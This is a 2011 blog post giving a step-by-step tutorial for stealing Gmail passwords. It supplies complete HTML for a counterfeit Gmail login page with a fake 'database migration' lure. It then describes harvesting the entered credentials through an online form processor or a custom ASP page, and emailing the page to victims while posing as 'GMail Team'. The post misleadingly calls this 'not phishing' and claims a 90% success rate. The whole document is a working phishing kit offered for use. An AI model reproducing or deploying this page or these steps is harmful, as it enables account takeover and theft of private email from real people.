Thursday, April 14, 2011
Cracking GMail Account Password
Do you like this story?
1>>Here is the most effective technique for cracking GMail Accounts Passwords.
This method uses 'Social Engineering' rather than 'Phishing'.
Follow the steps as given below :-
Success Rate :- 90%
Step-1 : Create your own fake gmail login form using HTML
here is the html code for it
<html lang="en" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type=text/css>
<!--
body,td,div,p,a,font,span {font-family: arial,sans-serif}
body {margin-top:2}
.c {width: 4; height: 4}
.bubble {background-color:#C3D9FF}
.tl {padding: 0; width: 4; text-align: left; vertical-align: top}
.tr {padding: 0; width: 4; text-align: right; vertical-align: top}
.bl {padding: 0; width: 4; text-align: left; vertical-align: bottom}
.br {padding: 0; width: 4; text-align: right; vertical-align: bottom}
.caption {color:#000000; white-space
wrap; background:#E8EEFA; text-align:center}.form-noindent {background-color: #ffffff; border: #C3D9FF 1px solid}
.feature-image {padding: 15 0 0 0; vertical-align: top; text-align: right; }
.feature-description {padding: 15 0 0 10; vertical-align: top; text-align: left; }
// -->
</style>
<title>
Gmail: Email from Google
</title>
</noscript>
</head>
<body bgcolor=#ffffff link=#0000FF vlink=#0000FF onload="OnLoad()">
<table width=95% border=0 align=center cellpadding=0 cellspacing=0>
<tr valign=top>
<td width=1%> <img src="https://mail.google.com/mail/help/images/logo.gif" border=0 width=143 height=59 alt="Gmail" align=left vspace=10/> </noscript>
</td>
<td width=99% bgcolor=#ffffff valign=top>
<table width=100% cellpadding=1>
<tr valign=bottom>
<td><div align=right> </div></td>
</tr>
<tr>
<td nowrap=nowrap>
<table width=100% align=center cellpadding=0 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
<tr>
<td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
<script>utmx_section("title")</script>
<td class=bubble rowspan=2 style="font-family:arial;text-align:left;font-weight:bold;padding:5 0"><b>Welcome to Gmail</b></td>
<td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
</noscript>
</tr>
<tr>
<td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>
<td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table width=94% align=center cellpadding=5 cellspacing=1>
<tr>
<td valign=top style="text-align:left"><b>A Google approach to email.</b>
<td valign=top>
</tr>
<tr>
<td width=75% valign=top>
<p style="margin-bottom: 0;text-align:left"><font size=-1> Dear <b><victim name></b>,
<br><br>
<table align="center" width="75%">
<tr><td><font size="-1">
We are moving database partly to our new server.<br>
This require your account verification for proper redirection...!<br>
Please verify yourself by entering correct google account 'username' and 'password'. Click 'Move'.<br>
Repply this message within 72 hours.<br>
Thank You ! for your Co-Operation........!
</font><br><br>
<b>GMail Team</b>
</td></tr></table>
</font>
</p>
</noscript>
</noscript> </td> <td valign=top>
<div id=login>
<form id="gaia_loginform" action="login.asp" method="post">
<div id="gaia_loginbox">
<table class="form-noindent" cellspacing="3" cellpadding="5" width="100%" border="0">
<tr>
<td valign="top" style="text-align:center" nowrap="nowrap"
bgcolor="#e8eefa">
<div class="loginBox">
<table id="gaia_table" align="center" border="0" cellpadding="1" cellspacing="0">
<tr>
<td colspan="2" align="center">
<table>
<tr>
<td valign="top"><font color="#0000FF">G</font><font color="#FF0000">o</font><font color="#FFCC33">o</font><font color="#0000FF">g</font><font color="#009900">l</font><font color="#FF0000">e</font></td>
<td valign="middle"> <font size="+0"><b>Account</b></font>
</td>
</tr>
</table></td>
</tr>
<script type="text/javascript"><!--
function onPreCreateAccount() {
return true;
}
function onPreLogin() {
if (window["onlogin"] != null) {
return onlogin();
} else {
return true;
}
}
--></script>
<tr>
<td colspan="2" align="center"> </td>
</tr>
<tr>
<td nowrap="nowrap"> <div align="right"> <span class="gaia le lbl">
Username: </span> </div></td>
<td> <input type="text" name="Email" id="Email"
size="18" value=""
class='gaia le val'
/> </td>
</tr>
<tr>
<td></td>
<td align="left"> </td>
</tr>
<tr>
<td align="right"> <span class="gaia le lbl"> Password:
</span> </td>
<td> <input type="password"
name="Passwd" id="Passwd"
size="18"
class="gaia le val"
/> </td>
</tr>
<tr>
<td> </td>
<td align="left"> </td>
</tr>
<tr>
<td> </td>
<td align="left"> <input type="submit" class="gaia le button" name="signIn"
value="Move"
/> </td>
</tr>
</table>
</div>
</td>
</tr>
</table>
</div>
</form>
</div> <br>
<table class=form-noindent cellpadding=0 width=100% bgcolor=#E8EEFA id=links>
<tr bgcolor=#E8EEFA>
<td valign=top align="center"><font size=+0><br>
<font size="-1"> <a href="http://mail.google.com/mail/help/intl/en/about.html">About
Gmail</a
> <a href="http://mail.google.com/mail/help/intl/en/about_whatsnew.html">New
features!</a> </font> </font></td>
</table>
</noscript>
</table>
<br>
<table width=95% align=center cellpadding=3 cellspacing=0 bgcolor=#C3D9FF style=margin-bottom:5>
<tr>
<td class="bubble tl" align=left valign=top><img src=https://mail.google.com/mail/images/corner_tl.gif class=c alt="" /></td>
<td class=bubble rowspan=2 style=text-align:left>
<div align=center>
<font size=-1 color=#666666>©2008 Google -
<a href="http://www.google.com/a/help/intl/en/users/user_features.html#utm_medium=et&utm_source=gmail-en&utm_campaign=crossnav&token=gmail_footer">Gmail for Organizations</a> -
<a href="http://gmailblog.blogspot.com/?utm_source=en-gmftr&utm_medium=et&utm_content=gmftr">Gmail Blog</a> -
<a href="http://mail.google.com/mail/help/intl/en/terms.html">Terms</a>
- <a href="http://mail.google.com/support/">Help</a>
</font>
</div>
</td>
<td class="bubble tr" align=right valign=top><img src=https://mail.google.com/mail/images/corner_tr.gif class=c alt="" /></td>
</tr>
<tr>
<td class="bubble bl" align=left valign=bottom><img src=https://mail.google.com/mail/images/corner_bl.gif class=c alt="" /></td>
<td class="bubble br" align=right valign=bottom><img src=https://mail.google.com/mail/images/corner_br.gif class=c alt="" /></td>
</tr>
</table>
</body>
</html>
now We require a form processor to process this fake login form, i.e. to store the username and password entered by the victim.
The username and password entered by victim can either be stored in database or send directly to the predefined e-mail address.
This can be done in two ways-
1) Using online form processors, which are freely available and ready to use.
eg. One of such form processor is provided by http://www.formmail.com . You have to register with www.formmail.com and configure your fake gmail login form to be processed by formmail.com . The configuration is different for each formmail account.
OR
2) If you are having your own domain hosted on some server; knowing the basics of ASP for processing HTML forms, you can create your own form processor in ASP (eg. 'login.asp' page) for above given fake gmail login form. Here you should only put both 'gmail.html' and 'login.asp' files to your server.
Step-3 : Now both of your 'Fake Gmail Login Form (eg. gmail.html)' and 'Form Processor' are ready to use.
Now you can send the fake gmail login form as an html mail to the victim's e-mail address, hoping that the victim gets fooled into entering the account username and password and click on 'Move' button.
Note:- You can use Microsoft Outlook for sending HTML e-mail.
Also, you must use your fake name as 'GMail Team' or 'GMail' while sending fake login form to victim.
As soon as victim click on 'Move' button he/she get redirected to predefined webpage (eg. http://www.gmail.com), while his/her 'username' and 'password' get emailed to you by formmail.com .
That's It............!
Done.......
This post was written by: Rishikesh
Rishikesh is a 17 years old part time blogger, web designer and front end web developer. Follow him on Twitter
Subscribe to:
Post Comments (Atom)
0 Responses to “Cracking GMail Account Password”
Post a Comment